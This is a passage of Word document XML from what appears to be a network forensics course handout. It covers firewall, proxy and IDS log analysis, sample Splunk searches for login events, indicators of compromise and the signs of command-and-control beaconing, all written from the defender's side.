      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connections at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">regular intervals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the same server — beaconing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An internal server talking to the internet when it never did before.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-lived connections on unusual ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Firewall, Proxy and IDS Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network devices write logs about every decision they make. Combined, they allow an investigator to reconstruct an incident in detail even when no packet capture exists.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records</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Questions it answers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Firewall</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Time, source/destination IP and port, protocol, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">action (allow/deny/drop)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, rule ID, bytes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Which hosts were blocked? Which were allowed to reach what? Was there a port scan or an outbound connection to a bad IP?</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Proxy / web gateway</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client IP, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, HTTP method, status code, bytes, user-agent, category</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Which sites did a user visit? What was downloaded? Which user-agent (browser or malware)?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IDS/IPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Snort, Suricata, Zeek)</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Alert name, signature ID, severity, packets that triggered it</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Which attack signature fired? Source and target of the attack?</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DNS logs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Client, query name, type, response</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Which domains did a host look up? Any odd long names (tunnelling)?</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DHCP / VPN / authentication logs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IP-to-device and user mappings; login times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Which device and user had a certain IP at that time?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Web server logs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Client IP, time, request, status, user-agent</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Which web attacks were attempted and which succeeded?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconstructing an incident from logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start from a known indicator (alert, IP, user, time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Find all log entries that mention it in each source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Map IP addresses to devices and users (DHCP, VPN, NAT logs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Order the entries by time and normalise time zones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at what came </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (how it got in) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (what it did next).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for gaps and contradictions, and explain them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Log correlation with Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> collects logs from many sources into one searchable platform, using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Processing Language (SPL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is the tool used in your practicals.</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Sample SPL searches</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4625 | timechart span=5m count</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4625 | stats count by src_ip, user | sort - count</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4624 Logon_Type=3 Account_Name=Administrator | table _time, src_ip, ComputerName</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=firewall action=blocked | stats count by src_ip | where count &gt; 100</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SPL command</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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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search</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / keywords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Filter events (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EventCode=4625</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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stats count by field</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Count events per value, e.g. failed logins per IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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timechart span=5m count</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Draw events over time to see bursts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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table</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sort</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where</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dedup</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 chosen columns, order, filter results, remove duplicates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Alerts and dashboards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Save a search as an alert (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">more than 20 failed logins from one IP in 5 minutes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) or put results on a dashboard</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Why correlation helps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows log: many failed logons then a success for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Firewall log: the same source IP was allowed to reach port 3389 (RDP). Web log: SQL injection from that IP earlier. Each log alone shows a piece; together they show the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">attack chain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — web exploitation, then remote login, then privilege use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Identifying C2 Traffic, Data Exfiltration and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a piece of evidence that suggests a system may be compromised: a malicious IP or domain, a file hash, a file path, a registry key, a mutex name or a user-agent string. Once found on one machine, IOCs are searched across the whole network (SIEM, EDR, firewall, DNS) to find other infected systems. A hash can be checked on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but such a result is supporting intelligence, not the sole basis for a conclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command and Control (C2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After infecting a machine, malware contacts the attacker’s server to receive commands, send stolen data, or download more malware. This communication is called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 (command and control)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Typical signs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Beaconing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the infected host connects to the same destination at regular intervals (every 30 s, 60 s, 5 minutes). In an I/O graph the traffic looks like a clock. Attackers add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">jitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (random variation, e.g. 60 s ± 20%) to make the pattern harder to detect, so analysts also look at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">destination</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistency, not just exact timing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connections to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">newly registered or rarely seen domains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, raw IP addresses or unusual ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
